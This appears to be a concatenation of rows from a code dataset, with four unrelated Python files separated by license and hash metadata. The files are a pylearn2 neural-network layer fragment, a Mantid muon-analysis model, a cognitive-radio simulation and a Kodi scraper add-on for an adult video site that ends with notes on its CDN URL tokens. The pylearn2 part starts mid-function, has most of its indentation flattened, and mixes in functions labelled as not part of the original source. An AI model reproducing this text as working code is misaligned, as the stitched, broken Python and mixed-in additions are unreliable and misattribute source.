# method, which only returns a CompositeSpace when the number
# of components is greater than 1
if len(cur_state_below) == 1:
cur_state_below, = cur_state_below
else:
cur_state_below = state_below
rvals.append(layer.fprop(cur_state_below))
return tuple(rvals)
def _weight_decay_aggregate(self, method_name, coeff):
if isinstance(coeff, py_float_types):
return T.sum([getattr(layer, method_name)(coeff)
for layer in self.layers])
elif is_iterable(coeff):
assert all(layer_coeff >= 0 for layer_coeff in coeff)
return T.sum([getattr(layer, method_name)(layer_coeff) for
layer, layer_coeff in safe_zip(self.layers, coeff)
if layer_coeff > 0], dtype=config.floatX)
else:
raise TypeError("CompositeLayer's " + method_name + " received "
"coefficients of type " + str(type(coeff)) + " "
"but must be provided with a float or list/tuple")
def get_weight_decay(self, coeff):
"""
Provides an expression for a squared L2 penalty on the weights,
which is the weighted sum of the squared L2 penalties of the layer
components.
Parameters
----------
coeff : float or tuple/list
The coefficient on the squared L2 weight decay penalty for
this layer. If a single value is provided, this coefficient is
            used for each component layer. If a list or tuple of
coefficients is given they are passed on to the component
layers in the given order.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the squared L2 weight decay penalty term for
this layer.
"""
return self._weight_decay_aggregate('get_weight_decay', coeff)
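    # For example (hypothetical coefficients), on a CompositeLayer with three
    # components, get_weight_decay([.01, 0., .001]) penalizes only the first
    # and third components, while get_weight_decay(.01) applies the same
    # coefficient to every component.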
def get_l1_weight_decay(self, coeff):
"""
        Provides an expression for an L1 penalty on the weights,
        which is the weighted sum of the L1 penalties of the layer
components.
Parameters
----------
coeff : float or tuple/list
The coefficient on the L1 weight decay penalty for this layer.
If a single value is provided, this coefficient is used for
            each component layer. If a list or tuple of coefficients is
given they are passed on to the component layers in the
given order.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the L1 weight decay penalty term for this
layer.
"""
return self._weight_decay_aggregate('get_l1_weight_decay', coeff)
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
return sum(layer.cost(Y_elem, Y_hat_elem)
for layer, Y_elem, Y_hat_elem in
safe_zip(self.layers, Y, Y_hat))
@wraps(Layer.set_mlp)
def set_mlp(self, mlp):
super(CompositeLayer, self).set_mlp(mlp)
for layer in self.layers:
layer.set_mlp(mlp)
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = OrderedDict()
# TODO: reduce redundancy with fprop method
for i, layer in enumerate(self.layers):
if self.routing_needed and i in self.layers_to_inputs:
cur_state_below = [state_below[j]
for j in self.layers_to_inputs[i]]
# This is to mimic the behavior of CompositeSpace's restrict
# method, which only returns a CompositeSpace when the number
# of components is greater than 1
if len(cur_state_below) == 1:
cur_state_below, = cur_state_below
else:
cur_state_below = state_below
if state is not None:
cur_state = state[i]
else:
cur_state = None
if targets is not None:
cur_targets = targets[i]
else:
cur_targets = None
d = layer.get_layer_monitoring_channels(
cur_state_below, cur_state, cur_targets)
for key in d:
rval[layer.layer_name + '_' + key] = d[key]
return rval
@wraps(Model._modify_updates)
def _modify_updates(self, updates):
for layer in self.layers:
layer.modify_updates(updates)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
return get_lr_scalers_from_layers(self)
class FlattenerLayer(Layer):
"""
A wrapper around a different layer that flattens
the original layer's output.
The cost works by unflattening the target and then
calling the wrapped Layer's cost.
This is mostly intended for use with CompositeLayer as the wrapped
Layer, and is mostly useful as a workaround for theano not having
a TupleVariable with which to represent a composite target.
There are obvious memory, performance, and readability issues with doing
this, so really it would be better for theano to support TupleTypes.
See pylearn2.sandbox.tuple_var and the theano-dev e-mail thread
"TupleType".
Parameters
----------
raw_layer : Layer
Layer that FlattenerLayer wraps.
"""
def __init__(self, raw_layer):
super(FlattenerLayer, self).__init__()
self.__dict__.update(locals())
del self.self
self.layer_name = raw_layer.layer_name
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.raw_layer.set_input_space(space)
total_dim = self.raw_layer.get_output_space().get_total_dimension()
self.output_space = VectorSpace(total_dim)
@wraps(Layer.get_input_space)
def get_input_space(self):
return self.raw_layer.get_input_space()
@wraps(Layer.get_monitoring_channels)
def get_monitoring_channels(self, data):
return self.raw_layer.get_monitoring_channels(data)
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
raw_space = self.raw_layer.get_output_space()
state = raw_space.undo_format_as(state,
self.get_output_space())
if targets is not None:
targets = self.get_target_space().format_as(
targets, self.raw_layer.get_target_space())
return self.raw_layer.get_layer_monitoring_channels(
state_below=state_below,
state=state,
targets=targets
)
@wraps(Layer.get_monitoring_data_specs)
def get_monitoring_data_specs(self):
return self.raw_layer.get_monitoring_data_specs()
@wraps(Layer.get_params)
def get_params(self):
return self.raw_layer.get_params()
@wraps(Layer.get_weights)
def get_weights(self):
return self.raw_layer.get_weights()
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeffs):
return self.raw_layer.get_weight_decay(coeffs)
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeffs):
return self.raw_layer.get_l1_weight_decay(coeffs)
@wraps(Layer.set_batch_size)
def set_batch_size(self, batch_size):
self.raw_layer.set_batch_size(batch_size)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
self.raw_layer.modify_updates(updates)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
return self.raw_layer.get_lr_scalers()
@wraps(Layer.fprop)
def fprop(self, state_below):
raw = self.raw_layer.fprop(state_below)
return self.raw_layer.get_output_space().format_as(raw,
self.output_space)
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
raw_space = self.raw_layer.get_output_space()
target_space = self.output_space
raw_Y = target_space.format_as(Y, raw_space)
raw_Y_hat = raw_space.undo_format_as(Y_hat, target_space)
raw_space.validate(raw_Y_hat)
return self.raw_layer.cost(raw_Y, raw_Y_hat)
@wraps(Layer.set_mlp)
def set_mlp(self, mlp):
super(FlattenerLayer, self).set_mlp(mlp)
self.raw_layer.set_mlp(mlp)
@wraps(Layer.get_weights)
def get_weights(self):
return self.raw_layer.get_weights()
class WindowLayer(Layer):
"""
Layer used to select a window of an image input.
The input of the layer must be Conv2DSpace.
Parameters
----------
layer_name : str
A name for this layer.
window : tuple
A four-tuple of ints indicating respectively
the top left x and y position, and
the bottom right x and y position of the window.
"""
def __init__(self, layer_name, window):
super(WindowLayer, self).__init__()
self.__dict__.update(locals())
del self.self
if window[0] < 0 or window[0] > window[2] or \
window[1] < 0 or window[1] > window[3]:
raise ValueError("WindowLayer: bad window parameter")
@wraps(Layer.fprop)
def fprop(self, state_below):
extracts = [slice(None), slice(None), slice(None), slice(None)]
extracts[self.rows] = slice(self.window[0], self.window[2] + 1)
extracts[self.cols] = slice(self.window[1], self.window[3] + 1)
extracts = tuple(extracts)
return state_below[extracts]
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if not isinstance(space, Conv2DSpace):
raise TypeError("The input to a Window layer should be a "
"Conv2DSpace, but layer " + self.layer_name +
" got " + str(type(self.input_space)))
axes = space.axes
self.rows = axes.index(0)
self.cols = axes.index(1)
nrows = space.shape[0]
ncols = space.shape[1]
if self.window[2] + 1 > nrows or self.window[3] + 1 > ncols:
raise ValueError("WindowLayer: bad window shape. "
"Input is [" + str(nrows) + ", " +
str(ncols) + "], "
"but layer " + self.layer_name + " has window "
+ str(self.window))
self.output_space = Conv2DSpace(
shape=[self.window[2] - self.window[0] + 1,
self.window[3] - self.window[1] + 1],
num_channels=space.num_channels,
axes=axes)
@wraps(Layer.get_params)
def get_params(self):
return []
@wraps(Layer.get_monitoring_channels)
def get_monitoring_channels(self):
return []
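# Hedged illustration, not part of the original pylearn2 source: the window
# selection performed by WindowLayer.fprop is ordinary slicing on the row and
# column axes of the batch. The batch shape and ('b', 0, 1, 'c') axis order
# below are assumptions made for this example only.
def _example_window_slice():
    batch = np.zeros((2, 32, 32, 3))   # (batch, rows, cols, channels)
    window = (4, 6, 19, 25)            # top-left (x, y), bottom-right (x, y)
    out = batch[:, window[0]:window[2] + 1, window[1]:window[3] + 1, :]
    assert out.shape == (2, 16, 20, 3)
    return out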
def generate_dropout_mask(mlp, default_include_prob=0.5,
input_include_probs=None, rng=(2013, 5, 17)):
"""
Generate a dropout mask (as an integer) given inclusion
probabilities.
Parameters
----------
mlp : object
An MLP object.
default_include_prob : float, optional
The probability of including an input to a hidden
layer, for layers not listed in `input_include_probs`.
Default is 0.5.
input_include_probs : dict, optional
A dictionary mapping layer names to probabilities
of input inclusion for that layer. Default is `None`,
        in which case `default_include_prob` is used for all
layers.
rng : RandomState object or seed, optional
A `numpy.random.RandomState` object or a seed used to
create one.
Returns
-------
mask : int
An integer indexing a dropout mask for the network,
drawn with the appropriate probability given the
inclusion probabilities.
"""
if input_include_probs is None:
input_include_probs = {}
if not hasattr(rng, 'uniform'):
rng = np.random.RandomState(rng)
total_units = 0
mask = 0
for layer in mlp.layers:
if layer.layer_name in input_include_probs:
p = input_include_probs[layer.layer_name]
else:
p = default_include_prob
for _ in xrange(layer.get_input_space().get_total_dimension()):
mask |= int(rng.uniform() < p) << total_units
total_units += 1
return mask
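# Hedged illustration, not part of the original pylearn2 source: the integer
# returned above packs one inclusion bit per input unit, in layer order. The
# helper below (taking a hypothetical list of per-layer input dimensions)
# shows how such a bitmask can be unpacked again.
def _example_decode_dropout_mask(mask, layer_input_dims):
    """Decode an integer dropout mask into per-layer lists of booleans."""
    decoded = []
    bit = 0
    for dim in layer_input_dims:
        decoded.append([bool((mask >> (bit + i)) & 1) for i in range(dim)])
        bit += dim
    return decoded
# e.g. _example_decode_dropout_mask(0b1011, [2, 2]) == [[True, True], [False, True]]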
def sampled_dropout_average(mlp, inputs, num_masks,
default_input_include_prob=0.5,
input_include_probs=None,
default_input_scale=2.,
input_scales=None,
rng=(2013, 5, 17),
per_example=False):
"""
Take the geometric mean over a number of randomly sampled
dropout masks for an MLP with softmax outputs.
Parameters
----------
mlp : object
An MLP object.
inputs : tensor_like
A Theano variable representing a minibatch appropriate
for fpropping through the MLP.
num_masks : int
The number of masks to sample.
default_input_include_prob : float, optional
The probability of including an input to a hidden
layer, for layers not listed in `input_include_probs`.
Default is 0.5.
input_include_probs : dict, optional
A dictionary mapping layer names to probabilities
of input inclusion for that layer. Default is `None`,
        in which case `default_include_prob` is used for all
layers.
default_input_scale : float, optional
The amount to scale input in dropped out layers.
input_scales : dict, optional
A dictionary mapping layer names to constants by
which to scale the input.
rng : RandomState object or seed, optional
A `numpy.random.RandomState` object or a seed used to
create one.
per_example : bool, optional
If `True`, generate a different mask for every single
test example, so you have `num_masks` per example
        instead of `num_masks` networks total. If `False`,
`num_masks` masks are fixed in the graph.
Returns
-------
geo_mean : tensor_like
A symbolic graph for the geometric mean prediction of
all the networks.
"""
if input_include_probs is None:
input_include_probs = {}
if input_scales is None:
input_scales = {}
if not hasattr(rng, 'uniform'):
rng = np.random.RandomState(rng)
mlp._validate_layer_names(list(input_include_probs.keys()))
mlp._validate_layer_names(list(input_scales.keys()))
if per_example:
outputs = [mlp.dropout_fprop(inputs, default_input_include_prob,
input_include_probs,
default_input_scale,
input_scales)
for _ in xrange(num_masks)]
else:
masks = [generate_dropout_mask(mlp, default_input_include_prob,
input_include_probs, rng)
for _ in xrange(num_masks)]
outputs = [mlp.masked_fprop(inputs, mask, None,
default_input_scale, input_scales)
for mask in masks]
return geometric_mean_prediction(outputs)
def exhaustive_dropout_average(mlp, inputs, masked_input_layers=None,
default_input_scale=2., input_scales=None):
"""
Take the geometric mean over all dropout masks of an
MLP with softmax outputs.
Parameters
----------
mlp : object
An MLP object.
inputs : tensor_like
A Theano variable representing a minibatch appropriate
for fpropping through the MLP.
masked_input_layers : list, optional
A list of layer names whose input should be masked.
Default is all layers (including the first hidden
layer, i.e. mask the input).
default_input_scale : float, optional
The amount to scale input in dropped out layers.
input_scales : dict, optional
A dictionary mapping layer names to constants by
which to scale the input.
Returns
-------
geo_mean : tensor_like
A symbolic graph for the geometric mean prediction
of all exponentially many masked subnetworks.
Notes
-----
This is obviously exponential in the size of the network,
don't do this except for tiny toy networks.
"""
if masked_input_layers is None:
masked_input_layers = mlp.layer_names
mlp._validate_layer_names(masked_input_layers)
if input_scales is None:
input_scales = {}
mlp._validate_layer_names(input_scales.keys())
if any(key not in masked_input_layers for key in input_scales):
not_in = [key for key in input_scales
if key not in mlp.layer_names]
raise ValueError(", ".join(not_in) + " in input_scales"
" but not masked")
num_inputs = mlp.get_total_input_dimension(masked_input_layers)
outputs = [mlp.masked_fprop(inputs, mask, masked_input_layers,
default_input_scale, input_scales)
for mask in xrange(2 ** num_inputs)]
return geometric_mean_prediction(outputs)
def geometric_mean_prediction(forward_props):
"""
    Take the geometric mean of the softmax predictions from several
    forward propagations (e.g. one per dropout mask).
Parameters
----------
forward_props : list
A list of Theano graphs corresponding to forward
propagations through the network with different
dropout masks.
Returns
-------
geo_mean : tensor_like
        A symbolic graph for the geometric mean prediction
        of the given forward propagations.
Notes
-----
    The size of the resulting graph grows linearly with the number of
    forward propagations provided.
"""
presoftmax = []
for out in forward_props:
assert isinstance(out.owner.op, T.nnet.Softmax)
assert len(out.owner.inputs) == 1
presoftmax.append(out.owner.inputs[0])
average = reduce(operator.add, presoftmax) / float(len(presoftmax))
return T.nnet.softmax(average)
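# Hedged numerical check, not part of the original pylearn2 source: applying
# softmax to the averaged pre-softmax activations (as done above) yields the
# renormalized geometric mean of the individual softmax outputs.
def _example_geometric_mean_identity():
    rng = np.random.RandomState(0)
    z = rng.randn(4, 3, 10)  # 4 dropout masks, batch of 3, 10 classes
    def softmax(a):
        e = np.exp(a - a.max(axis=-1, keepdims=True))
        return e / e.sum(axis=-1, keepdims=True)
    lhs = softmax(z.mean(axis=0))
    geo = np.prod(softmax(z), axis=0) ** (1.0 / z.shape[0])
    rhs = geo / geo.sum(axis=-1, keepdims=True)
    assert np.allclose(lhs, rhs)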
class BadInputSpaceError(TypeError):
"""
An error raised by an MLP layer when set_input_space is given an
object that is not one of the Spaces that layer supports.
"""
def get_lr_scalers_from_layers(owner):
"""
Get the learning rate scalers for all member layers of
`owner`.
Parameters
----------
owner : Model
Any Model with a `layers` field
Returns
-------
lr_scalers : OrderedDict
A dictionary mapping parameters of `owner` to learning
rate scalers.
"""
rval = OrderedDict()
params = owner.get_params()
for layer in owner.layers:
contrib = layer.get_lr_scalers()
assert isinstance(contrib, OrderedDict)
# No two layers can contend to scale a parameter
assert not any([key in rval for key in contrib])
# Don't try to scale anything that's not a parameter
assert all([key in params for key in contrib])
rval.update(contrib)
assert all([isinstance(val, float) for val in rval.values()])
return rval
|
bsd-3-clause
| -8,657,553,449,295,059,000
| 33.730232
| 79
| 0.554054
| false
| 4.164048
| false
| false
| false
|
mganeva/mantid
|
scripts/Muon/GUI/MuonAnalysis/load_widget/load_widget_model.py
|
1
|
1513
|
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
from __future__ import (absolute_import, division, print_function)
from Muon.GUI.Common.muon_load_data import MuonLoadData
class LoadWidgetModel(object):
"""
The model is responsible for storing the currently loaded run or runs
(both the nun numbers, filenames and workspaces) as well as loading new runs using a separate loading thread.
"""
def __init__(self, loaded_data_store=MuonLoadData(), muon_context=None):
self._loaded_data_store = loaded_data_store
self._context = muon_context
def add_muon_data(self, filename, workspace, run):
self._loaded_data_store.add_data(run=run, filename=filename, workspace=workspace)
def clear_data(self):
self._loaded_data_store.clear()
self._context.current_runs = []
def is_filename_loaded(self, filename):
return self._loaded_data_store.contains(filename=filename)
def is_run_loaded(self, run):
return self._loaded_data_store.contains(run=run)
@property
def workspaces(self):
return self._context.current_workspaces
@property
def runs(self):
return self._context.current_runs
@property
def filenames(self):
return self._context.current_filenames
|
gpl-3.0
| 1,026,091,008,242,188,000
| 32.622222
| 113
| 0.693985
| false
| 3.708333
| false
| false
| false
|
maemre/rasim
|
sim.py
|
1
|
10863
|
#!/usr/bin/env python
# Holy import!
from __future__ import division
from numpy import *
from matplotlib import pyplot as P
from agent import OptHighestSNR, RandomChannel, IndividualQ, FixChannel
from channel.simple import SimpleChannel
from traffic.simple import SimpleTraffic
from environment import Environment
import os
# simulation parameters:
from params import *
from args import argv
# create data-output directory
output_dir = os.path.join(argv.output_dir, prefix)
try:
os.mkdir(argv.output_dir)
except OSError:
pass
try:
os.mkdir(output_dir)
except OSError:
pass
# generate channel-related stuff
# goodness of channels
goodness = concatenate((ones(N_good_channel), zeros(N_channel - N_good_channel)))
random.shuffle(goodness)
# channel generator
def gen_chan(i):
ch = noise['bad']
if goodness[i]:
ch = noise['good']
return SimpleChannel(base_freq + chan_bw * i, **ch)
def init_state(i):
# disk point picking - http://mathworld.wolfram.com/DiskPointPicking.html
r = sqrt(random.rand())*r_init
theta = random.rand()*2*pi
return {
'state': (random.randint(0, N_channel), random.randint(0, B)),
'x': r*cos(theta),
'y':r*sin(theta),
'id': i,
'speed': 0 if i < N_stationary_agent else 30. / 3.6 * t_slot # 30 kph
}
if argv.agents is None:
print 'No agent type is specified. Simulation cannot run. For details run rasim with "--help" option'
exit(1)
agent_types = []
for i in [RandomChannel, IndividualQ, OptHighestSNR]: # + [FixChannel, OptHighestSNR]
if i.__name__ in argv.agents:
agent_types.append(i)
paths = {}
for a in agent_types:
paths[a] = os.path.join(output_dir, a.__name__)
try:
os.mkdir(paths[a])
except OSError:
pass
# init statistics
avg_energies = zeros([len(agent_types), N_agent, t_total])
en_type = zeros([len(agent_types), t_total])
avg_bits = zeros([len(agent_types), N_agent, t_total])
bits_type = zeros([len(agent_types), t_total], dtype=int_)
en_idle = zeros([len(agent_types), N_agent, t_total])
en_sense = zeros([len(agent_types), N_agent, t_total])
en_sw = zeros([len(agent_types), N_agent, t_total])
en_tx = zeros([len(agent_types), N_agent, t_total])
buf_overflow = zeros([len(agent_types), N_agent, t_total], dtype=int_)
buf_levels = zeros([len(agent_types), N_agent, t_total], dtype=int_)
init_positions = zeros([len(agent_types), N_runs, N_agent, 2])
last_positions = zeros([len(agent_types), N_runs, N_agent, 2])
#############
# Arrays below are reused for each agent type and their values are saved per agent type
# for a small memory footprint!!
#############
# Channel traffic record. 0 = no traffic, 1 = PU traffic
channel_traf = zeros([N_channel, N_runs, t_total], dtype=int_)
# Agent transmission record. 0..N_channel-1 = transimt over given channel, N_channel = idle
# a huge matrix indeed
transmissions = zeros([N_runs, N_agent, t_total])
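# Hedged post-processing sketch, not part of the original simulator: the
# integer coding above (channel index 0..N_channel-1 = transmit on that
# channel, N_channel = idle) can be reduced to per-channel usage counts.
def _example_channel_utilization(transmissions_run):
    """Count, per channel, how many agent-slots were spent transmitting.
    `transmissions_run` is the (N_agent, t_total) slice for a single run."""
    counts = zeros(N_channel, dtype=int_)
    for ch in xrange(N_channel):
        counts[ch] = (transmissions_run == ch).sum()
    return counts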
def run_simulation(agent_type, agent_no):
global avg_energies, en_type, avg_bits, bits_type, buf_overflow
# channels themselves
channels = [gen_chan(i) for i in xrange(N_channel)]
# channel traffics
traffics = [SimpleTraffic() for i in xrange(N_channel)]
env = Environment(channels, traffics, pd=0.9, pf=0.1)
if argv.verbose or not batch_run:
print 'Agent type:', agent_type.__name__
for n_run in xrange(N_runs):
# generate agents
agents = [agent_type(env, init_state(i)) for i in xrange(N_agent)]
env.set_agents(agents)
init_positions[agent_no, n_run] = [(a.x, a.y) for a in agents]
energies = zeros([N_agent, t_total])
bits = zeros([N_agent, t_total])
if argv.verbose or not batch_run:
print "Run #%d of %d(agent), %d of %d(total)" % (n_run + 1, N_runs, n_run + agent_no * N_runs + 1, N_runs * len(agent_types))
rates = [0,0,0,0,0]
for t in xrange(t_total):
env.next_slot()
channel_traf[:,n_run,t] = env.t_state
# get actions
actions = [a.act_then_idle() for a in agents]
# collect statistics for buffer overflow and buffer levels
for i, a in enumerate(agents):
buf_overflow[agent_no, i, t] = int(a.buf_overflow)
buf_levels[agent_no, i, t] += B - a.B_empty
# collisions per channel where,
# N_agent: PU collision, (0..N_agent-1): SU collision with ID
# -1: No collision
collisions = [N_agent if traffic else -1 for traffic in env.t_state]
collided = [False] * N_agent
for i, a in enumerate(actions):
if a['action'] == ACTION.TRANSMIT:
if collisions[a['channel']] == N_agent:
# collision with PU, mark agent as collided
collided[i] = True
rates[4] += 1
elif collisions[a['channel']] >= 0:
# collision with SU, mark both agents as collided
collided[i] = collided[collisions[a['channel']]] = True
else:
# no collision *yet*
collisions[a['channel']] = i
transmissions[n_run, i, t] = a['channel']
else:
transmissions[n_run, i, t] = N_channel
# For each agent compute transmission successes and report
# transmission success/failure to agent
for i, a in enumerate(agents):
# collect energy usage statistics
energies[i, t] = a.E_slot
en_type[agent_no, t] += a.E_slot
en_idle[agent_no, i, t] += a.E_idle
en_sense[agent_no, i, t] += a.E_sense
en_tx[agent_no, i, t] += a.E_tx
en_sw[agent_no, i, t] += a.E_sw
act = actions[i]
# send feedback to idle agents too
if act['action'] == ACTION.IDLE:
a.feedback(False, False, idle=True)
# if collision occurred, report collusion
if collided[i]:
a.feedback(collision=True, success=False)
rates[0] += 1
continue
if act['action'] != ACTION.TRANSMIT:
rates[3] += 1
continue
ch = env.channels[act['channel']]
# no collision, check transmission success by channel quality
pkt_sent = ch.transmission_successes(act['power'], act['bitrate'], act['pkt_size'], act['n_pkt'], a.x, a.y)
# give feedback
if pkt_sent == 0:
a.feedback(collision=False, success=False)
else:
a.feedback(collision=False, success=True, N_pkt=pkt_sent)
rates[1] += pkt_sent * 1.0 / act['n_pkt']
rates[2] += act['n_pkt'] - pkt_sent
# collect bit transmission statistics
bits[i, t] = pkt_sent * act['pkt_size']
bits_type[agent_no, t] += pkt_sent * act['pkt_size']
# save energies
#savetxt('energy_%d.txt' % n_run, energies)
# take averages
avg_energies[agent_no] += energies
avg_bits[agent_no] += bits
# print stats
rates[4] = rates[4] / (t_total * N_channel) * 100
if argv.verbose or not batch_run:
print "Collisions: %d\nSuccesses: %f\nLost in Channel: %d\nIdle: %d\n%%PU Collisions: %f" % tuple(rates)
print "%Success:", rates[1]/(t_total*N_agent - rates[3]) * 100
print "%Collided channels:", rates[0]/(t_total*N_channel) * 100
print
last_positions[agent_no, n_run] = [(a.x, a.y) for a in agents]
# save statistics
save(os.path.join(output_dir, agent_type.__name__, 'channel_traf.npy'), channel_traf)
save(os.path.join(output_dir, agent_type.__name__, 'transmissions.npy'), transmissions)
for i, agent_type in enumerate(agent_types):
run_simulation(agent_type, i)
buf_levels /= N_runs
avg_energies /= N_runs
avg_bits /= N_runs
en_idle /= N_runs
en_sense /= N_runs
en_tx /= N_runs
en_sw /= N_runs
# give outputs
if not batch_run:
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(cumsum(en_type[i])/cumsum(bits_type[i]), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('Energy/bit (cumulative)')
P.title('Efficiency (Cumulative Energy/bit) vs Time')
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(convolve(buf_overflow[i].sum(axis=0)/(N_agent*1.0), [1./7]*7), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('# of buffer overflows (7-point avg, per agent)')
P.title('Buffer Overflows vs Time')
P.figure()
P.bar(arange(len(agent_types)), buf_overflow.sum(axis=(1,2)))
P.legend()
P.xlabel('Agent Type')
P.ylabel('# of buffer overflows (avg, per agent)')
P.xticks(arange(len(agent_types) + 1), [x.__name__ for x in agent_types] + [''])
P.title('Buffer overflows vs Agent Type')
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(buf_levels[i].sum(axis=0)/(N_agent*1.0), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('buffer occupancy')
P.title('Buffer Occupancy (avg) vs Time')
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(cumsum(en_idle[i].sum(axis=0) / N_agent), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('Avg Idle Energy (cumulative)')
P.title('Idle Energy vs Time')
P.show()
print "Throughput:"
for i, agent_type in enumerate(agent_types):
print "\t%s:\t%f" % (agent_type.__name__, sum(bits_type[i]))
# save statistics
# save agent types
with open(os.path.join(output_dir, 'agents.txt'), 'w') as f:
f.write('\n'.join(x.__name__ for x in agent_types))
save(os.path.join(output_dir, 'avg_energies.npy'), avg_energies)
save(os.path.join(output_dir, 'avg_bits.npy'), avg_bits)
save(os.path.join(output_dir, 'en_idle.npy'), en_idle)
save(os.path.join(output_dir, 'en_sense.npy'), en_sense)
save(os.path.join(output_dir, 'en_tx.npy'), en_tx)
save(os.path.join(output_dir, 'en_sw.npy'), en_sw)
save(os.path.join(output_dir, 'en_type.npy'), en_type)
save(os.path.join(output_dir, 'buf_overflow.npy'), buf_overflow)
save(os.path.join(output_dir, 'buf_levels.npy'), buf_overflow)
save(os.path.join(output_dir, 'init_positions.npy'), init_positions)
save(os.path.join(output_dir, 'last_positions.npy'), last_positions)
|
apache-2.0
| 5,194,816,224,260,189,000
| 38.220217
| 137
| 0.58308
| false
| 3.309872
| false
| false
| false
|
alfa-jor/addon
|
plugin.video.alfa/channels/sxyprn.py
|
1
|
6787
|
# -*- coding: utf-8 -*-
#------------------------------------------------------------
import urlparse,re
from platformcode import config, logger
from core import scrapertools
from core.item import Item
from core import servertools
from core import httptools
host = 'https://www.sxyprn.com'
def mainlist(item):
logger.info()
itemlist = []
itemlist.append( Item(channel=item.channel, title="Nuevos" , action="lista", url=host + "/blog/all/0.html?fl=all&sm=latest"))
itemlist.append( Item(channel=item.channel, title="Mas vistos" , action="lista", url=host + "/popular/top-viewed.html"))
itemlist.append( Item(channel=item.channel, title="Mejor valorada" , action="lista", url=host + "/popular/top-rated.html"))
itemlist.append( Item(channel=item.channel, title="Sitios" , action="categorias", url=host))
itemlist.append( Item(channel=item.channel, title="Categorias" , action="categorias", url=host))
itemlist.append( Item(channel=item.channel, title="Buscar", action="search"))
return itemlist
def search(item, texto):
logger.info()
texto = texto.replace(" ", "-")
item.url = host + "/%s.html" % texto
try:
return lista(item)
except:
import sys
for line in sys.exc_info():
logger.error("%s" % line)
return []
def categorias(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t| |<br>|<br/>", "", data)
if "Sitios" in item.title:
patron = "<a href='([^']+)' target='_blank'><div class='top_sub_el top_sub_el_sc'>.*?"
patron += "<span class='top_sub_el_key_sc'>([^<]+)</span>"
patron += "<span class='top_sub_el_count'>(\d+)</span>"
else:
patron = "<a class='tdn' href='([^']+)'.*?"
patron += "<span class='htag_el_tag'>([^<]+)</span>"
patron += "<span class='htag_el_count'>(\d+) videos</span>"
matches = re.compile(patron,re.DOTALL).findall(data)
for scrapedurl,scrapedtitle,cantidad in matches:
scrapedplot = ""
scrapedthumbnail = ""
scrapedurl = urlparse.urljoin(item.url,scrapedurl)
title = scrapedtitle + " (" + cantidad + ")"
itemlist.append( Item(channel=item.channel, action="lista", title=title, url=scrapedurl,
thumbnail=scrapedthumbnail , plot=scrapedplot) )
return itemlist
def lista(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t| |<br>|<br/>", "", data)
patron = "<img class=.*?"
patron += " src='([^']+)'.*?"
patron += "<span class='duration_small'.*?'>([^<]+)<.*?"
patron += "<span class='shd_small'.*?>([^<]+)<.*?"
patron += "post_time' href='([^']+)' title='([^']+)'"
matches = re.compile(patron,re.DOTALL).findall(data)
for scrapedthumbnail,scrapedtime,quality,scrapedurl,scrapedtitle in matches:
title = "[COLOR yellow]%s[/COLOR] [COLOR red]%s[/COLOR] %s" % (scrapedtime,quality,scrapedtitle)
thumbnail = "https:" + scrapedthumbnail
scrapedurl = urlparse.urljoin(item.url,scrapedurl)
plot = ""
itemlist.append( Item(channel=item.channel, action="play", title=title, url=scrapedurl,
thumbnail=thumbnail, fanart=thumbnail, plot=plot, contentTitle = scrapedtitle))
#
next_page = scrapertools.find_single_match(data, "<div class='ctrl_el ctrl_sel'>.*?<a href='([^']+)'")
if next_page:
next_page = urlparse.urljoin(item.url,next_page)
itemlist.append( Item(channel=item.channel, action="lista", title="Página Siguiente >>", text_color="blue",
url=next_page) )
return itemlist
# Developer notes (observed data-vnfo values vs. the working CDN URLs; the
# bare numbers are the timestamp offsets between the two):
# 130
# https://www.sxyprn.com/cdn8/c9/e1y9b3mzc1o101lzg5q2cze1j390h/kK-CN4l73_EeBhkoYNYA2A/1568228307/65xbtac5i3dbd568c4r9z4575at/g5fd37a74djew1zev21dm176g86.vid
# data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/e1y9b3mzc1o101lzg5q2cze1j390h\/kK-CN4l73_EeBhkoYNYA2A\/1568228437\/65xbtac5i3dbd568c4r9z4575at\/g5fd37a74djew1zev21dm176g86.vid
# -114
# data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/m1v963ez51m1u11za5u2xz41e3806\/BQFIcJlTMr0-Z1gVUTxgaQ\/1568228604\/je54bwaz5r3xbn5a864k91487sa\/o5sd17r7xdaea1be32xd41b6b8z.vid
# https://www.sxyprn.com/cdn8/c9/m1v963ez51m1u11za5u2xz41e3806/BQFIcJlTMr0-Z1gVUTxgaQ/1568228490/je54bwaz5r3xbn5a864k91487sa/o5sd17r7xdaea1be32xd41b6b8z.vid
# -137
